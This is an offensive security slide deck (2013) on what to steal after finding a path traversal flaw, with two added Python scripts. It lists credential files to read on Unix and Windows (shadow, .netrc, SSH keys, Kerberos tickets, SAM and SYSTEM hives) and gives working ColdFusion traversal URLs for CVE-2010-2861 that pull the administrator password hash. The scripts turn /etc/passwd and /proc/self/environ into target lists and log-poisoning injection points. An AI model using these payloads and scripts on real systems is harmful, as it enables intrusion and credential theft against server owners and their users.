Path traversal post exploitation By George Lagoda Nov 23, 2013

4.1. Path traversal post_exploitation


Page 1:

Path traversal post exploitation
By George Lagoda
Nov 23, 2013

Page 2:

This slide intentionally left blank (always dreamed of it)

Page 3:

Page 4:

Common understanding of path traversal

A Path Traversal attack aims to access files and directories that are stored outside the web root folder.

(OWASP)

WHAT FILES AND DIRS OUTSIDE THE WEB ROOT DO WE NEED AND WHY?

Page 5:

/etc/passwd – why so special?

It is world-readable on practically every Unix host, so it is the first file to confirm that the traversal really reads files, and it lists every account with its home directory and login shell, which is the map for everything that follows.

Page 6:

Y.O.B.A. hacking

NEXT STEPS
1. /root/.bash_history

If not accessible, try harder:

/home/username/.bash_history gave me:

Page 7:

Looks like an epic win?:

After analyzing prepare_release.sh:

Page 8:

Page 9:

.netrc file
• Provides "remember me" for ftp
What I had when I checked /home/username/.netrc:

machine ftp.server.com
login secret_usr
password secret_pwd

Page 10:

Help for shell uploading
• /proc/self/environ
• /proc/self/status
Useful if we want to find the access or error logs of Apache or the document root of the server, or if we also have LFI and want to exploit Apache log poisoning. Note that /proc/self is whichever process performs the read, so through a web application it is the web server (or PHP) worker itself; that is why its environment carries DOCUMENT_ROOT, SCRIPT_FILENAME and the request headers as HTTP_* variables.
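An added example (not the author's code) of what to do with the two /proc files once they come back through the traversal: split the NUL-separated environ, pick out the document root and the attacker-controlled HTTP_* variables (the injection points if the file is later included via LFI), read the worker's name and uid from status, and turn the distro hint in SERVER_SOFTWARE into an ordered list of Apache log paths to request next. SAMPLE_ENVIRON, SAMPLE_STATUS and the log directory list are constructed assumptions for the example.

```python
"""Parse /proc/self/environ and /proc/self/status read through a traversal.

Added example for this deck, not the author's code. SAMPLE_ENVIRON and
SAMPLE_STATUS are constructed to look like what a mod_php worker exposes;
the log directory list is an assumption of the example.
"""

SAMPLE_ENVIRON = (
    b"APACHE_RUN_USER=www-data\x00"
    b"DOCUMENT_ROOT=/var/www/vhosts/shop/htdocs\x00"
    b"SCRIPT_FILENAME=/var/www/vhosts/shop/htdocs/index.php\x00"
    b"SERVER_SOFTWARE=Apache/2.2.22 (Ubuntu)\x00"
    b"HTTP_USER_AGENT=Mozilla/5.0\x00"
    b"HTTP_REFERER=http://example.com/\x00"
    b"REMOTE_ADDR=203.0.113.7\x00"
)

SAMPLE_STATUS = (
    "Name:\tapache2\nState:\tS (sleeping)\nPid:\t1337\nPPid:\t1300\n"
    "Uid:\t33\t33\t33\t33\nGid:\t33\t33\t33\t33\n"
)


def parse_environ(raw):
    """environ is KEY=VALUE records separated by NUL bytes. A short read
    just yields fewer records, so callers never assume a key is present."""
    env = {}
    for rec in raw.split(b"\x00"):
        if b"=" in rec:
            k, v = rec.split(b"=", 1)
            env[k.decode("utf-8", "replace")] = v.decode("utf-8", "replace")
    return env


def parse_status(text):
    """status is 'Key:<tab>value' lines. Uid/Gid carry four fields
    (real, effective, saved, fs); keep the real one."""
    out = {}
    for line in text.splitlines():
        if ":" in line:
            k, v = line.split(":", 1)
            fields = v.split()
            out[k.strip()] = fields[0] if fields else ""
    return out


def attacker_controlled(env):
    """HTTP_* variables mirror request headers verbatim, so they are the
    values we control if /proc/self/environ is later included via LFI."""
    return {k: v for k, v in env.items() if k.startswith("HTTP_")}


def log_dirs(server_software):
    """Order the usual Apache log directories by the distro tag Apache
    appends to its Server string (assumed list for the example)."""
    debian = ["/var/log/apache2"]
    redhat = ["/var/log/httpd"]
    other = ["/var/log/apache", "/usr/local/apache2/logs"]
    s = server_software.lower()
    if "centos" in s or "red hat" in s or "fedora" in s:
        return redhat + debian + other
    return debian + redhat + other


def next_targets(env, status):
    """Files worth requesting next, derived only from what the two files said."""
    dirs = log_dirs(env.get("SERVER_SOFTWARE", ""))
    return {
        "docroot": env.get("DOCUMENT_ROOT", ""),
        "script": env.get("SCRIPT_FILENAME", ""),
        "worker": f"{status.get('Name', '?')} (uid {status.get('Uid', '?')})",
        "access_logs": [f"{d}/{n}" for d in dirs for n in ("access.log", "access_log")],
        "error_logs": [f"{d}/{n}" for d in dirs for n in ("error.log", "error_log")],
        "poison_points": sorted(attacker_controlled(env)),
    }


if __name__ == "__main__":
    env = parse_environ(SAMPLE_ENVIRON)
    st = parse_status(SAMPLE_STATUS)
    for key, val in next_targets(env, st).items():
        print(f"{key}: {val}")
```

Feed the raw bytes from the traversal response straight into parse_environ; a half-read environ only loses trailing records, and the functions cope with a missing DOCUMENT_ROOT rather than crashing mid-engagement.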

Page 11:

Something for creds
• SSH keys, often passwordless: /home/*/.ssh/id*
• Kerberos tickets: /tmp/krb5cc_*, /tmp/krb5.keytab
• PGP keys: /home/*/.gnupg/secring.gpg
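An added example (not the author's code) that ties slides 5, 6, 9 and 11 together: parse the /etc/passwd retrieved through the traversal, keep the accounts with a real login shell, expand each one into the per-user files the deck goes after next (.bash_history, .netrc, SSH keys, the GnuPG secret keyring, the uid-named Kerberos cache), and parse any .netrc that comes back into machine/login/password triples. SAMPLE_PASSWD and SAMPLE_NETRC are constructed; the SSH file names are the standard OpenSSH ones and the path list is this example's assumption, not something the deck prescribes.

```python
"""From /etc/passwd to the per-user files this deck goes after next.

Added example for this deck, not the author's code. SAMPLE_PASSWD and
SAMPLE_NETRC are constructed; the per-user path list is an assumption
built from slides 6, 9 and 11 plus the standard OpenSSH key file names.
"""
from dataclasses import dataclass

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
deploy:x:1000:1000:Deploy user,,,:/home/deploy:/bin/bash
jenkins:x:1001:1001::/var/lib/jenkins:/bin/false
alice:x:1002:1002::/home/alice:/bin/zsh
not a passwd line at all
"""

SAMPLE_NETRC = """\
machine ftp.server.com login secret_usr password secret_pwd
machine git.server.com
    login deploy
    password hunter2
default login anonymous password user@example.com
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync", ""}


@dataclass
class PasswdEntry:
    name: str
    uid: int
    gid: int
    home: str
    shell: str


def parse_passwd(text):
    """name:pw:uid:gid:gecos:home:shell. Anything that is not seven fields
    with numeric uid/gid (page noise around the traversal output, a
    truncated last line) is dropped rather than guessed at."""
    entries = []
    for line in text.splitlines():
        f = line.strip().split(":")
        if len(f) == 7 and f[2].isdigit() and f[3].isdigit():
            entries.append(PasswdEntry(f[0], int(f[2]), int(f[3]), f[5], f[6]))
    return entries


def interactive_users(entries):
    """root plus every account that has a real login shell."""
    return [e for e in entries if e.shell not in NOLOGIN_SHELLS]


def candidate_files(entries):
    """Per-user reads in the order the deck goes after them."""
    paths = []
    for e in interactive_users(entries):
        h = e.home.rstrip("/") or "/"
        paths.append(f"{h}/.bash_history")
        paths.append(f"{h}/.netrc")
        paths += [f"{h}/.ssh/{k}" for k in ("id_rsa", "id_dsa", "id_ecdsa", "id_ed25519")]
        paths.append(f"{h}/.gnupg/secring.gpg")
        paths.append(f"/tmp/krb5cc_{e.uid}")  # MIT krb5 names the cache after the uid
    return paths


def parse_netrc(text):
    """.netrc is whitespace-separated tokens: 'machine NAME' or 'default'
    opens an entry, 'login' and 'password' take one value each, and an
    entry may span several lines. 'macdef' runs to end of file."""
    creds, cur, tok = [], None, text.split()
    i = 0
    while i < len(tok):
        word = tok[i]
        nxt = tok[i + 1] if i + 1 < len(tok) else None
        if word == "machine" and nxt is not None:
            cur = {"machine": nxt, "login": None, "password": None}
            creds.append(cur)
            i += 2
        elif word == "default":
            cur = {"machine": "default", "login": None, "password": None}
            creds.append(cur)
            i += 1
        elif word in ("login", "password") and cur is not None and nxt is not None:
            cur[word] = nxt
            i += 2
        elif word == "macdef":
            break
        else:
            i += 1
    return [c for c in creds if c["login"] and c["password"]]


if __name__ == "__main__":
    for p in candidate_files(parse_passwd(SAMPLE_PASSWD)):
        print(p)
    for c in parse_netrc(SAMPLE_NETRC):
        print(c)
```

The service accounts (www-data, jenkins) are deliberately skipped because they have no login shell, so a home directory such as /var/lib/jenkins never makes the list; if a later file shows that account is actually used, add it back by hand.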

Page 12:

What distro do we have?
• /etc/SUSE-release # Novell SUSE
• /etc/redhat-release, /etc/redhat_version # Red Hat
• /etc/fedora-release # Fedora
• /etc/slackware-release, /etc/slackware-version # Slackware
• /etc/debian_release, /etc/debian_version # Debian
• /etc/mandrake-release # Mandrake
• /etc/sun-release # Sun JDS
• /etc/release # Solaris/Sparc
• /etc/gentoo-release # Gentoo
• /etc/arch-release # Arch Linux (file will be empty)
• arch # OpenBSD; sample output: "OpenBSD.amd64" (note: arch is a command, not a file, so it only helps once you have command execution)

Page 13:

What about Windows?

Page 14:

File / Expected contents, description

%SYSTEMDRIVE%\boot.ini
A file that can be counted on to be on virtually every NT 5.x host (2000/XP/2003; Vista and later keep the boot configuration in the BCD store instead). Helps confirm that a read is actually happening.

%WINDIR%\win.ini
Another file to look for if boot.ini isn't there or isn't coming back, which is sometimes the case.

%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
Stores users' passwords in hashed form (LM hash and NTLM hash). The live SAM under System32\config is locked while Windows is running, which is why the setup-time copy in \repair and the RegBack copy are the ones to try; if those fail too, the hive can still be retrieved using forensic or Volume Shadow Copy methods.

%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system
The SYSTEM hive; needed for the boot key that decrypts the hashes in the SAM.

%SYSTEMDRIVE%\autoexec.bat

Page 15:

%SYSTEMDRIVE%\pagefile.sys
Large file, but contains spill-over from RAM; usually lots of good information can be pulled from it, but it should be a last resort because of its size.

%WINDIR%\system32\logfiles\httperr\httperr1.log
IIS 6 (HTTP.sys) error log

%SystemDrive%\inetpub\logs\LogFiles
IIS 7's logs location

%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log
IIS 6 site log (year, month, day in the file name)

%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
Application and Security event logs (pre-Vista .Evt format)

%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
Registry hive copies written during setup

%WINDIR%\system32\CCM\logs\*.log
SCCM client logs

%USERPROFILE%\ntuser.dat
The user's registry hive (HKCU); locked while that user is logged on

Page 16:

You really thought I'd forget about kittens?

Page 17:

• /etc/passwd
• /etc/shadow (gotta try..)
• /etc/shadow~ # (sometimes there when edited with gedit)
• /etc/master.passwd
• /etc/group
• /etc/hosts
• /etc/crontab
• /etc/sysctl.conf
• /etc/resolv.conf
• /etc/samba/smb.conf
• /etc/exports
• /etc/auto.master
• /etc/auto_master
• /etc/fstab
• /etc/sudoers

Page 18:

Some software defaults (Apache httpd file layout per distro):
http://wiki.apache.org/httpd/DistrosDefaultLayout

Page 19:

Also for ColdFusion (not the latest versions, but still). The target, password.properties, holds the administrator password hash:

ColdFusion 6:
http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en

ColdFusion 7:
http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en

ColdFusion 8:
http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en

All versions (JRun4 multiserver layout):
http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en

http://www.cvedetails.com/cve/CVE-2010-2861/

Page 20:

• If you still don't have a path traversal to post-exploit, this tool may be useful: http://dotdotpwn.blogspot.ru/ (DotDotPwn, a directory traversal fuzzer)

Page 21:

Why so serious?

Page 22:

Thank you for visiting us
And
HACK YOU (the end).